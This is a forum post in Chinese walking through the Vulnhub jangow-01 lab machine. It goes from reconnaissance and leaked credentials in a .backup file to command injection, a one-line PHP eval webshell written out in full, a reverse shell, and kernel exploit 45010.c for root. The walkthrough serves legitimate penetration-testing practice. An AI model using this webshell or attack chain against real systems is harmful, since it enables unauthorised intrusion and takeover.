Vulnhub靶机练习笔记-jangow-01-1.0.1

boy0s   ·   发表于 2023-07-25 16:22:52   ·   技术文章

靶机下载

https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova

靶场环境

NAT模式
kali:192.168.242.131
靶机:192.168.242.136

渗透测试

上来先信息收集(属于是肌肉记忆了)
nmap扫一波端口,只开放了21和80端口。

dirsearch爆破目录,发现.backup文件。

访问.backup,是个连接数据库的配置文件,直接拿到数据库账号密码(芜湖)。

用这个账号连ftp试试(连上了,但没什么有用的信息)

再回到80端口,点击Buscar

在buscar传参处改为pwd,可以命令执行

利用echo写入一句话木马
echo '<?php eval($_POST["cmd"]);?>'>eval.php

ls查看,成功写入

蚁剑连接

写入shell.php反弹nc,这里只能反弹443端口

访问shell.php触发反弹

切换完整的交互式bash
python3 -c import pty;pty.spawn("/bin/bash")

提权

蚁剑打开终端,查看系统信息进行提权,内核版本是ubuntu16.04

searchsploit搜索ubuntu16.04,利用45010.c可提权

把45010.c的代码复制出来,使用蚁剑上传eval.c

gcc编译eva.c
ggc eval.c -o eval
给编译好的eval执行权限
chmod +x eval
执行eval提权,得到root权限

拿flag咯

用户名金币积分时间理由
Track-魔方 1400.00 0 2023-07-26 13:01:57 平台唯一 500 深度 200 普适 400 可读 200 稀缺 100

打赏我,让我更有动力~

1 条回复   |  直到 2023-8-1 | 403 次浏览

simon
发表于 2023-8-1

靶场源地址有吗,想下一下其他的靶场

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.